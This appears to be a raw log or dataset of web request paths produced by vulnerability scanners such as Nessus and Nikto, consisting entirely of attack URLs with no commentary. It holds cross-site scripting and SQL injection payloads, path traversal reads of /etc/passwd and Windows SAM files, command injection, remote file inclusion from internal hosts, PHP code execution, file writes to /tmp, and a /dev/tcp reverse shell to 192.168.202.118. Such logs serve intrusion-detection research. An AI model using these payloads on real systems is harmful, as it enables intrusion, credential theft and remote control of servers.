content=\"testabrn=6368\">\n/en-us/odzk29aa.mscgi?<script>document.cookie=\"testtfvh=2141;\"</script>\n/examples/jsp/jsp2/jspx/awstatstotals.php?sort={${phpinfo()}}{${exit()}}\n/9ko6m4c8.cfm?<script>document.cookie=\"testylik=3403;\"</script>\n/help.php?q=ver\\x0c>q98299135&rem\\x0c\n/examples/jsp/cal/more.php?id=1'\n/vegasscripts/\n/top.php?stuff=\"rm\\x0cq81327195&rem\\x0c\n/top.php?stuff=\"ping;-w;9000;-n;1;1.2.3.4|rem;\n/scriptbreaker/\n/people's_daily/\n/examples/jsp/error/texis.exe/nessus\n/www/delivery/ac.php?bannerid=-1331904184+or+1=1+--+';passthru(base64_decode($_server[http_nessus_2pzvm7lp]));die;/*\n/examples/jsp/num/index.php?search='><script>alert('autoindex_search_xss.nasl');</script>&searchmode=f\n/examples/jsp/jsp2/jspx/mrtg.cgi?cfg=/../../../../../../../../../winnt/win.ini\n/scripts/k0pxpjgnimox.inc\n/javascript/comments.exe\n/examples/servlets/servlet/index.php?configfile=../../../../../../../../../etc/passwd\n/rbec2ohx.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/checkbox/index.php?show=/etc/passwd\n/en-us/account/faq.php?action=&type=view&s=&id=-1' union select 0,1692805728,0,0,0,0,0--\n/u8yiqilu.x?<meta http-equiv=set-cookie content=\"testswjp=6010\">\n/rbec2ohx.cfm?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/jsp/error/save.php?file_save=/etc/passwd\n/o1zj4u9v.asp?<script>document.cookie=\"testabrn=6368;\"</script>\n/recordings/edit.jsp?page=user&editor=../../../install\n/l13b77e5.cgi?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/scripts/index.php?doc=http://xxxxxx./foo.php\n/javascript/opencart.exe\n/mscript-0/\n/l752x1ry.kspx?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/news/index.dot?id=../../../../../../../../../../../..//etc/passwd\\x00.jpg\n/examples/servlets/servlet/index.php?cat='\n/j4oqyvga.cfc?<script>cross_site_scripting.nasl</script>\n//</p><body><script src=http://www.example.com/test?rnd=q29372142></script><p>\n/top.php?stuff='\\x0auname >q13387342 #\n/main.php?logout=\"|ping,-w,7000,-n,1,4.3.2.1|rem,\n/scripts/starnet/addons/slideshow_full.php?album_name='836532164\n/top.php?stuff=\"&del;q42621598&rem;\n/scriptcenter/\n/cacti/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/i2n4v4rl.htm?<script>cross_site_scripting.nasl</script>\n/b5xdqgz2.nsf?<script>cross_site_scripting.nasl</script>\n/src/scripture.php?pageheaderfile=http://cirt.net/rfiinc.txt??\n/?<meta http-equiv=set-cookie content=\"testquyx=2820\">\n/recordings/nessus\"><script>alert('django_admin_xss.nasl')</script>/\n/examples/jsp/jsp2/el/cal_week.php?op=week&catview=999'\n/w4996nr0.php3?<meta http-equiv=set-cookie content=\"testttvs=7163\">\n/javascript/ls.exe\n/scripts/cachemgr.cgi\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\"+||+del+hwgl\n/scripts/www/delivery/ac.php?bannerid=-1332008322+or+1=1+--+';passthru(base64_decode($_server[http_nessus_lcfxz0km]));die;/*\n/p043snfr.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?stuff='del\\x09q81291893\\x09#\n/top.php?stuff=\"del\\x09q22258799\\x09#\n/examples/jsp/sessions/af.cgi?_browser_out=.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./.|./etc/passwd\n/examples/jsp/jsp2/el/loudblog/inc/parse_old.php?template=@system(id);@&php_use=1&phpseparator=@\n/j4oqyvga.aspx?<script>cross_site_scripting.nasl</script>\n/scripts/a1stats/a1disp3.cgi?/../../../../../../etc/passwd\n/examples/jsp/sessions/kernel/loadkernel.php?installpath=/etc/passwd\\x00\n/subscriptions.ppt\n/cgi-bin/index.php?id='union/**/select/**/0,0,419495929,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/<script>document.cookie=\"testvqcy=252;\"</script>\n/recordings/wiki.php/<script>foo</script>\n/cgi-bin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919143&lang_crm=../../vtigerservice.php\\x00\n/main.php?logout=\"ping -w 11000 -n 1 1.2.3.4|rem \n/top.php?stuff=\"|ping\\xa0-w\\xa08000\\xa0-n\\xa01\\xa04.3.2.1|rem\\xa0\n/en-us/s7qus4g3.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/account/starnet/modules/sn_allbum/slideshow.php?cmsdir=/etc/passwd\\x00\n/forgot_password.php?email=\\\"><script>alert(document.cookie)</script>\n/plato's/\n/examples/jsp/colors/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd\n/examples/jsp/jsp2/el/index.php?lng=../system_footer&sensor_program=phpsysinfo_241.nasl\n/zln2hm2z.mscgi?<script>document.cookie=\"testblcp=8120;\"</script>\n/1qwv2p5p.pl?<script>document.cookie=\"testvqcy=252;\"</script>\n/en-us/account/calendar.php?month=' union select 1,1,'1331905155','calendarix_month_sql_injection.nasl',1 #\n/cgi-bin/login.php?req=\"><script>alert('testlink_login_req_param_xss.nasl-1331908833')</script>\n/passwdqc_check/\n/3hlysl2x.cfc?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/main.php?stuff=\"\\x0dsleep 9 #\n/main.php?stuff=\"&rm q95559964&rem \n/7dbjwpw6.php3?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/examples/servlets/servlet/newsscript.pl?mode=admin\n/recordings/index.php?cid='\n/dir_thatware/config.php?root_path=http://192.168.202.118:8080/zz5thkvtmlgl?'\n/examples/jsp/colors/faxsurvey?cat /etc/passwd\n/examples/jsp/num/includes/converter.inc.php?include_path=/etc/passwd\\x00\n/scripts/callboth.php?seq=654321&out=123456&in=1332010399@nessus\\x0d\\x0aasteridex_in_code_injection.nasl\n/psynch/nph-psa.exe?css=http://cirt.net/rfiinc.txt?\n/top.php?stuff=\"ver >q51291193&rem \n/script_running/\n/en-us/odzk29aa.cgi?<script>document.cookie=\"testtfvh=2141;\"</script>\n/uc3w3bdi.dll?<script>document.cookie=\"testxllt=9940;\"</script>\n/lsoix5h3.php?<script>cross_site_scripting.nasl</script>\n/cgi-bin/yabb/yabb.cgi?board=board&action=display&num=<script>alert('vulnerable')</script>\n/7uz3ok60.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/main.php?logout='\\x0arm\\x09q63945264\\x09#\n/cgi-win/.passwd\n/examples/jsp/num/cgiip.exe/wservice=wsbroker1/webtools/oscommand.w\n/examples/jsp/error/module.php?module=osticket&file=../../../../../../../../../../../etc/passwd\n/vhzmaia2.cgi?<meta http-equiv=set-cookie content=\"testkogj=3979\">\n/admin/index.php?path_to_script=http://192.168.202.96:8080/whmch8ftkt7kv??&cmd=ls\n/manipulatorscript/\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"\\0174\\0044\\0000\\0377\\0347\" >> /tmp/xmefwyizyj0;echo|awstats118579.txt\n/manager/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd\n/examples/jsp/jsp2/jspx/includes/config.php?relative_script_path=http://xxxxxxx\n/qb2xy9aw.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/comments.php\n/3hlysl2x.asp?<script>document.cookie=\"testgjbe=8505;\"</script>\n/top.php?stuff='\\x0arm q54187211 #\n/modules.php?op=modload&name=news&file=article&sid=<script>alert('vulnerable');</script>\n/en-us/account/session/login.php?dest=nessus\"><script>alert('ossim_dest_xss.nasl')</script><!-- \n/include/scripts/run_auto_suspend.cron.php?dir=http://192.168.202.118:8080/2aibfaczmac8?\n/gwweb.exe?help=bad-request\n/en-us/account/remindpasswd\n/index.php/\"><script>alert(412185577680)</script><\"\n/<script>document.cookie=\"testyias=101;\"</script>\n/main.php?stuff=|ping;-w;8000;-n;1;1.2.3.4|rem;\n/main.php?logout=\"ver\\x09>q51755129&rem\\x09\n/examples/jsp/error/core/editor.php?editor_insert_bottom=/etc/passwd\n/awstats/awstats.pl?migrate=|echo;/bin/echo -en \"\\0174\\0044\\0000\\0377\\0347\" >> /tmp/yzicxmyifv0;echo|awstats319257.txt\n/examples/jsp/error/index.php?site=../../../../../../../../etc/passwd\\x00\n/javascript/requisition.exe\n/w4996nr0.cgi?<script>document.cookie=\"testttvs=7163;\"</script>\n/odzk29aa.asp?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/scripts/forum.php?id_article=1&id_forum=-1/**/union/**/select 199771194--\n/awstats/awstats.pl?migrate=|echo;/./tmp/ldlchhikup0 > /dev/null &;echo|awstats482213.txt\n/scripts/acegilogin.jsp\n/tomo'hern/\n/de3v2dd9.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/manager/launcher/apps/local?msgid=9374920.413424446445&amp;ns=launcher&amp;redirecting=true\n/en-us/esmozg5d.php?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/resolved.exe\n/scripts/cgi-test.exe\n/cgi-915/fileseek2.cgi?foot=&head=;cat /etc/passwd|\n/zqqemp6j.cgi?<script>cross_site_scripting.nasl</script>\n/scripts/store.php?crn=42'&action=show&show_products_mode=cat_click\n/l752x1ry.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/m5103snj.pl?<script>cross_site_scripting.nasl</script>\n/scriptsmessagedetail.asp?msg_id='\n/top.php?stuff='&uname >q76213281 #\n/0w155a7c.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/help/index.php?help_file=../../../../../../../../../../../etc/passwd\n/cgi-bin/foxweb.exe\n/eudora-script/\n/pvote/add.php?question=amigay&amp;o1=yes&amp;o2=yeah&amp;o3=well..yeah&amp;o4=bad \n/examples/jsp/cal/notify?from=nessus\"|id\"\n/cgi-bin/texis.exe/?-dump\n/javascript/htpasswd.mdb\n/examples/jsp/sessions/pfdispaly.cgi?../../../../../../etc/passwd\n/examples/jsp/checkbox/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini\n/cgi-bin/save.php?file_save=/etc/passwd\n/1r8cfrlf.htm?<meta http-equiv=set-cookie content=\"testydan=5106\">\n/gy23xnjq.kspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/www/delivery/ac.php?bannerid=-1332010394+or+1=1+--+';passthru(base64_decode($_server[http_nessus_llrkno2s]));die;/*\n/subscriptions.old\n/edzaia0i.mscgi?<script>cross_site_scripting.nasl</script>\n/p043snfr.html?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/el/atomicboard/index.php?location=../../../../../../../../../../../../../../../etc/passwd\n/cgi-bin/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331908714',null,null,null,null --\n/en-us/account/install.php?newlang=../../cpg_error.log\\x00\n/azcrfs8d.mscgi?<meta http-equiv=set-cookie content=\"testjpdr=9205\">\n/scripts/index.php?id=h6xj4vcok1'\n/examples/jsp/sessions/store.php?crn=42'&action=show&show_products_mode=cat_click\n/d7ktpmcq.htm?<script>cross_site_scripting.nasl</script>\n/en-us/account/newsscript.pl?mode=admin\n/q703m78q.cfc?<script>document.cookie=\"testvowq=604;\"</script>\n/cgi-bin/fileseek.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=\n/javascript/struts.exe\n/scripts/rihzp7swr3p6.inc\n/javascript/databases.exe\n/cgi-win/ion-p.exe?page=c:\\winnt\\repair\\sam\n/main.php?stuff=\"&del;q68954445&rem;\n/atomicboard/index.php?location=../../../../../../../../../../etc/passwd\n/scripts/t769qwej0llr.html\n/top.php?stuff='uname\\x09#\n/main.php?stuff=\"|ping\\x09-w\\x099000\\x09-n\\x091\\x094.3.2.1|rem\\x09\n/en-us/fo564rei.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/igtf0zon.do?<script>cross_site_scripting.nasl</script>\n/top.php?stuff=\"&rm;q62612992&rem;\n/help.php?q=\"&ver,>q81149724&rem,\n/main.php?stuff='\\x0dsleep 7 #\n/0z575z74.idc?<script>document.cookie=\"testuhsv=9753;\"</script>\n/6wb70v0b.cgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/union.exe\n/htbin/.passwd\n/scripts/rx9ysf2iwv4j.asp\n/script_library/\n/recordings/ncbook/ncbook.cgi?action=default&current=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10\n/vac1l5vm.mscgi?<script>cross_site_scripting.nasl</script>\n/ydexw8by.dll?<meta http-equiv=set-cookie content=\"testulex=4996\">\n/i686v90l.idc?<script>document.cookie=\"testfutf=1550;\"</script>\n/eg2u8pbv.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/igtf0zon.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/admin/index.php?path_to_script=http://192.168.202.96:8080/ipb5ri??&cmd=ls\n/examples/jsp/num/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd\n/examples/servlets/servlet/sql.php?lib_inc=1&btndrop=no&goto=/etc/passwd\n/en-us/account/web_store/web_store.cgi?page=../../../../../../etc/passwd\\x00.html\n/top.php?stuff=\"&sleep 11 #\n/cgi-bin/hpnst.exe?c=p+i=srvsysteminfo.html\n/scripts/lpzj75ztw9lb.shtml\n/examples/jsp/error/index.php?name=your account&profile=anyone\"><script>alert('nessus was here');</script>\n/examples/jsp/jsp2/el/cgiforum.pl?thesection=../../../../../../../../etc/passwd\\x00\n/phpmyadmin/pmwiki.php?globals[farmd]=/etc/passwd\\x00\n/cgi-bin/showcat.php?cat=1'\n/cgi-bin/post16.exe\n/help.php?q=\"&del\\x09q27972468&rem\\x09\n/phpmyadmin//../../../../../../../../etc/passwd\\x00en\n/examples/jsp/cal/nslookup.cgi?query=localhost;id&type=any&ns=\n/examples/jsp/num/index.php?act=arcade&do=stats&gameid=1'\n/n1afe1y6.exe?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/bin/a1stats/a1disp3.cgi?../../../../../../../../../../etc/passwd\n/cgi-bin/nessus\"><script>alert('django_admin_xss.nasl')</script>/\n/javascript/wtai.exe\n/scripts/lastlines.cgi?process\n/manager/js/scripts.php?load=/etc/passwd\\x00\n/examples/jsp/colors/insertorder.cfm?cfid=1&cftoken=1 union select 1,2,3,4,storename,6,7,8,9,10,11,12,13,14,15 from params\"having 1=1\n/en-us/esmozg5d.cfc?<script>cross_site_scripting.nasl</script>\n/help.php?q=\"&rm,q25917292&rem,\n/edv3mapy.fts?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/neomail-prefs.pl?sessionid=nessus-session-0.neomail_sessionid_validation.nasl&action=addfolder&foldername=5_pgcld4ms4un_mgm\n/index.php?q=\"><script>alert(413706083530)</script><\"&r=10&page=9&section=6\n/help.php?q=ping;-w;10000;-n;1;4.3.2.1|rem;\n/examples/jsp/cal/viewpage.php?file=/etc/passwd\n/main.php?logout=\"del q29314884 #\n/moodle/filter/tex/texed.php?formdata=foo&pathname=foo\";ls+-l;chmod+555+/tmp/rlfsfoelhy;\"\n/examples/jsp/checkbox/sgdynamo.exe?htname=sgdynamo.exe\n/manager/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\\x00\n/fa8p8lr8.fts?<script>cross_site_scripting.nasl</script>\n/awstats/awstats.pl?migrate=|echo;chmod 777 /tmp/dedvphbiqt.sh;echo|awstats131113.txt\n/javascript/so.exe\n/examples/jsp/jsp2/jspx/htsearch?exclude=`/etc/passwd`\n/top.php?stuff=\"\\x0arm\\x09q18289426\\x09#\n/en-us/i686v90l.php?<script>document.cookie=\"testfutf=1550;\"</script>\n/scripts/bb_smilies.php?user=mtoxoje6mtoxoje6mtoxoje6li4vli4vli4vli4vli4vzxrjl3bhc3n3zaak\n/cacti/login.pl?login=ledgersmb_script_code_exec.nasl&script=-e print \"content-type: text/plain\\x0d\\x0a\\x0d\\x0a\";system(id)&action=logout\n/iisadmpwd/..\\xc0%qf..\\xc0%qf..\\xc0%qf..\\xc0%qf..\\xc0%qf../winnt/system32/cmd.exe?/c+dir+c:\\+/og\n/examples/jsp/sessions/admin.php?style=../../../../../../../../../../../../etc/passwd\\x00\n/top.php?stuff=\"&del\\x0bq54461117&rem\\x0b\n/windowsntloginscripttricksandtips/\n/examples/jsp/cal/nessus\"><script>alert('mod_perl_status_uri_xss.nasl')</script>\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904181&lang_crm=../../vtigerservice.php\\x00\n/examples/jsp/sessions/fxm.exe\n/javascript/yahoo.exe\n/index.php?mod_id=2&kb_ask=</textarea><script>alert(\"cerberus_support_center_mult_flaws.nasl\")</script>\n/examples/servlets/servlet/pollit/poll_it_ssi_v2.0.cgi?data_dir=/etc/passwd\\x00\n/ferrante imperato dell'historia naturale 1599/\n/main.php?stuff=\"del\\x0cq36356367&rem\\x0c\n/recordings/search.php?allwords=<br><script>foo</script>&cid=0&title=1&desc=1\n/main.php?stuff=\"&ver&rem \n/index.php?id=k7u62jp49d'\n/l13b77e5.jsp?<meta http-equiv=set-cookie content=\"testjvvf=7721\">\n/cacti/file.cgi?name=/eventcache/../../../../../../../../../../../boot.ini\n/examples/jsp/error/perl.exe?-v\n/examples/jsp/jsp2/jspx/index.php?mod_id=2&kb_ask=</textarea><script>alert(\"cerberus_support_center_mult_flaws.nasl\")</script>\n/escript/\n<meta http-equiv=set-cookie content=\"testwhac=3130\">\n/main.php?stuff=\"&del\\x09q71999354\\x09#\n/projects/1/repository/annotate?rev=`0<&214-;exec 214<>/dev/tcp/192.168.202.118/35049;sh <&214 >&214 2>&214`\n/7o5qp766.html?<script>cross_site_scripting.nasl</script>\n/admin/configset.php?settings_dir=/etc/passwd\\x00\n/macy's/\n/u95h6ymu.mscgi?<script>document.cookie=\"testkhwc=4028;\"</script>\n/main.php?stuff=\"rm\\x0bq27764952&rem\\x0b\n/scripts/u7m5ok8eqpfy.asp\n/bemarket/postscript/postscript.php?p_mode=http://192.168.202.96:8080/txenjrxf3?\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('chmod+777+/tmp/mwukuzjaqe.sh').\"]=1\n/b5xdqgz2.pl?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/um7xpn15.html?<script>document.cookie=\"testotoy=6142;\"</script>\n/main.php?stuff=\";sleep\\x099\\x09#\n/6wb70v0b.asp?<script>cross_site_scripting.nasl</script>\n/scripts/parse_xml.cgi?action=login&filename=frameset.html|id\\x00|\n/dda2qr7j.jspa?<script>cross_site_scripting.nasl</script>\n/ap58k3ci.x?<script>cross_site_scripting.nasl</script>\n/ao22ww7y.nsf?<meta http-equiv=set-cookie content=\"testqppc=8767\">\n/<meta http-equiv=set-cookie content=\"testknim=9383\">\n/top.php?stuff=\"&del q51692947&rem \n/yver8r9o.php?<script>cross_site_scripting.nasl</script>\n/examples/jsp/jsp2/jspx/libraries/adodb/server.php?sql='adodb_sql_sql_injection.nasl\n/top.php?stuff=\\\\'\n/examples/jsp/num/btdownload.php?type=torrent&file=../../../../../../../../../../etc/passwd\n/zv8tv7h8.php3?<script>document.cookie=\"testcqwz=9752;\"</script>\n/javascript/page2.exe\n/odzk29aa.dll?<meta http-equiv=set-cookie content=\"testtfvh=2141\">\n/vac1l5vm.jspa?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/javascript/.htpasswd.sfish/bogus\\x0dskipfish-inject:bogus\n/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331919143&lang_crm=../../vtigerservice.php\\x00\n/javascript/.passwd.xslt\n/b4vng02k.htm?<meta http-equiv=set-cookie content=\"testtrlh=3672\">\n/fmnveedu.aspx?<script>document.cookie=\"testgfbr=7014;\"</script>\n/jackrabbit/search.jsp?q=%\"<script>alert(1331908697)</script>\n/h21y8w52.fts?<script>cross_site_scripting.nasl</script>\n/fcgi-bin/echo?foo=<script>alert('vulnerable')</script>\n/recordings/lib/dbman_filter.inc.php?lib_path=/etc/passwd\\x00\n/postinstallation-script/\n/fpnpp5zg.mscgi?<meta http-equiv=set-cookie content=\"testyias=101\">\n/top.php?stuff=\"&ping\\x0c-w\\x0c8000\\x0c-n\\x0c1\\x0c4.3.2.1&rem\\x0c\n/examples/jsp/error/zpanel.php?page=/etc/passwd\\x00\n/j4drbkil.jsp?<script>cross_site_scripting.nasl</script>\n/en-us/7o5qp766.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/33y9gcqq.jsp?<script>document.cookie=\"testnvxc=4301;\"</script>\n/xoops232b/htdocs/xoops_lib/modules/protector/onupdate.php?mydirname=a(){}system('/./tmp/btgjhjkaao.sh+>+/dev/null+&'); function v\n/manager/index.php?module=topics&func=view&topicid=-1 union select null,null,'mdpro_topicid_sql_injection.nasl-1331904418',null,null,null,null --\n/main.php?stuff=\"&ping\\x0b-w\\x0b8000\\x0b-n\\x0b1\\x0b1.2.3.4&rem\\x0b\n/0rufe52p.asp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/sudoscriptd/\n/javascript/.htpasswd.sfish/4294967295\n/hipkz026.pl?<script>document.cookie=\"testyrbs=2855;\"</script>\n/en-us/account/jgs_portal_statistik.php?meinaction=themen&month=1&year=1'\n/ghswfouu.mscgi?<script>document.cookie=\"testsqmm=5713;\"</script>\n/examples/jsp/jsp2/el/index.php?chemin=../../../../../../..//etc\n/main.php?logout=\"rm\\x0bq22255946&rem\\x0b\n/scripts/wxrdqnkjuwmu.asp\n/javascript/htpasswd.log\n/examples/jsp/colors/index.php?sensor_program=<script>alert('phpsysinfo_multiple_xss.nasl');</script>\n/scripts/b0j2ijssh6cu.pl\n/ht8pn8uq.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/cacti/phpnews/sendtofriend.php?mid='1'\n/40;15531272/\n/eei78ore.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n//q54599877&#x26;q3916&#x22;q3916&#x3c;q3916&#x3e;q54599877\n/nyvbv05h.php?<meta http-equiv=set-cookie content=\"testftxz=5980\">\n/s7qus4g3.aspx?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/.htaccess~\n/examples/servlets/servlet/lang/index.php?file=/etc/passwd\n/iktok2bw.do?<script>cross_site_scripting.nasl</script>\n/manager/admin/index.php?act=login&username=' union select 1,'pafaq_10b4.nasl','5e0bd03bec244039678f2b955a2595aa','',0,'',''--&password=nessus\n/main.php?logout='&uname >q65442989 #\n/6qbynt4f.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/ewc3rz1l.htm?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/top.php?stuff=\"ping -w 7000 -n 1 4.3.2.1&rem \n/rpxyx07v.cfm?<script>document.cookie=\"testbnli=1975;\"</script>\n/7dbjwpw6.x?<script>cross_site_scripting.nasl</script>\n/y8pmygrp.mscgi?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/nyjgaorz.pl?<script>cross_site_scripting.nasl</script>\n/examples/jsp/sessions/directory.php?dir=;cat /etc/passwd\n/3j8echh0.pl?<script>document.cookie=\"testfuqi=4189;\"</script>\n/top.php?stuff='uname\\x09>q39954515\\x09#\n/top.php?stuff=\\x0auname >q86844442 #\n/h4bi26jd.nsf?<script>document.cookie=\"testhrzx=1150;\"</script>\n/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.26.202/top.php%3fstuff%3d1861731255&frm_user=&scr_height=q52631618&scr_width=\n/iajtej82.idc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/y8pmygrp.cfc?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/opensiteadmin/scripts/classes/formmanager.php?path=http://192.168.202.96:8080/ipb5ri?\\x00\n/phpmyadmin/documentation.html?phpmyadmin='\"()&%1<script >prompt(997839)</script>\n/examples/jsp/checkbox/notify?from=nessus\"|id\"\n/cacti/index.php?id='union/**/select/**/0,0,1185697098,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/inc/formmail.inc.php?script_root=http://192.168.202.118:8080/moclyxlwqyfjnp?\n/modules.php?name=top&querylang=111111111111111111'\n/nubreed - food for thought 12'/\n/scripts/eezuu7xc7ge3.inc\n//%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd\n/esmozg5d.php?<script>cross_site_scripting.nasl</script>\n/ydexw8by.do?<script>document.cookie=\"testulex=4996;\"</script>\n/scripts/sgdynamo.exe?htname=<script>foo</script>\n/examples/jsp/num/wa.exe?debug-show-version\n/phpmyadmin/index.php?_language=../../../../../../../../../../etc/passwd\\x00\n//..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215etc/passwd\n/javascript/document.vbs\n/phpmyadmin/secure.php?cfgprogdir=/etc/passwd\\x00\n/examples/jsp/checkbox/base_local_rules.php?dir=<script>alert('base_local_rules_xss.nasl-1331904404')</script>\n/cgi-bin/store/agora.cgi?cart_id=<script>alert('vulnerable')</script>\n/cgi-bin/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd\n/scripts/6gl21a1hiz3s.sh\n/cgi-sys/c32web.exe/getimage?imagename=customeremail.txt\\x00.pdf\n/en-us/dda2qr7j.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/3hlysl2x.aspx?<meta http-equiv=set-cookie content=\"testgjbe=8505\">\n/javascript/class.exe\n/subscriptions.msg\n/quagynka.kspx?<script>cross_site_scripting.nasl</script>\n/using logon scripts figure 51102332855146/\n/i7prbs22.jsp?<script>document.cookie=\"testjnre=7328;\"</script>\n/phpwcms_template/inc_script/frontend_render/navigation/config_phplm.php?html_menu_dirpath=http://192.168.202.118:8080/2aibfaczmac8?\n/6qbynt4f.do?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/zabbix/frontends/php/locales.php?download=1&langto=1&extlang[\".system('/bin/echo+-en+\"\\0174\\0044\\0000\\0377\\0347\"+>>+/tmp/jdvccfaqtd0;').\"]=1\n/main.php?logout='\\x0adel\\x09q55586739\\x09#\n/manager/index.php?string='\n/scripts/wx4z4gedhl0l.php3\n/recordings/user.cgi?url=\"><script>alert(\"gossamer_links_url_xss.nasl\");</script>&from=add\n/\"united+states\"/\n/../.tar.gz\n/en-us/account/config.php?path[docroot]=/etc/passwd\\x00\n/main.php?logout='\\x0arm q64819443 #\n/ewc3rz1l.kspx?<meta http-equiv=set-cookie content=\"testkgqo=204\">\n/javascript/document.bz2\n/top.php?header=../../../../../../../../etc/passwd\n/examples/jsp/error/index.php?id=urjhxcl19w'\n/examples/jsp/num/index.php?id='union/**/select/**/0,0,669748674,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/help.php?q='\\x0adel\\x09q87897781\\x09#\n/examples/jsp/sessions/a1stats/a1disp3.cgi?/../../../../../../etc/passwd\n/b5xdqgz2.jsp?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/en-us/<img src=\"javascript:alert(cross_site_scripting.nasl);\">.jspa\n/javascript/ssh.exe\n/cgi-bin/?\"><script>alert('struts_sa_surl_xss.nasl')</script>\n/5o9zq43e.x?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/htaogvj.exe/\n/en-us/h5sc3gxy.x?<script>cross_site_scripting.nasl</script>\n/en-us/n9xlumt5.fts?<script>cross_site_scripting.nasl</script>\n/scripts/flserv.pl?cmd=exec_flsearch&query=ftplocate_fsite_cmd_exec.nasl&fsite=|id|\n/scripts/kfzqb5x87lvq.asp\n/l752x1ry.idc?<script>cross_site_scripting.nasl</script>\n/browse_item_details.asp?item_id='webstores_browseitemdetails_sql_injection.nasl\n/default.aspx/\"onmouseover=\"x='al';x='ert(413806083533)';eval(x);alert().aspx\n/help.php?q=\"ping,-w,8000,-n,1,1.2.3.4&rem,\n//</p><body><script/src=\"http://www.example.com/test?rnd=q34271463\"></script><p>\n/asset_description/\n/qczkquis.dll?<meta http-equiv=set-cookie content=\"testkwlg=5591\">\n/3m5knyc4.do?<script>document.cookie=\"testbgqj=6434;\"</script>\n/javascript/presentation.exe\n/main.php?logout=\"rm\\xa0q51679818&rem\\xa0\n/javascript/activex.exe\n/main.php?stuff=ver\\x09>q53217726&rem\\x09\n/mpcgi/gw5/gwweb.exe?help=bad-request\n/recordings/index.php?act=arcade&do=stats&gameid=1'\n/help.php?q=\"del\\x0bq54818771&rem\\x0b\n/iktok2bw.nsf?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/dcforum.cgi?az=list&forum=../../../../../../../etc/passwd\\x00\n/javascript/phpbb2.exe\n/examples/jsp/num/check_user_id.php?user_id=<script>foo</script>\n/en-us/account/index.php?album=../../../../../../../../../../etc/passwd\\x00\n/cacti/rot13sj.cgi?/etc/passwd\n/subscriptions_t/\n/examples/jsp/colors/data/fetch.php?page='\n/cgi-bin/evb/check_url.php?url=pligg_url_sql_injection.nasl' union select 1332008334,1061714587 -- \n/9o6g5vkn.dll?<img src=\"javascript:alert(cross_site_scripting.nasl);\">\n/scripts/index.php?id='union/**/select/**/0,0,1385593493,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0--\n/recordings/auktion.cgi?menue=../../../../../../../../../etc/passwd\n/javascript/document.jar\n/help.php?q=\"\\x0duname >q43695626 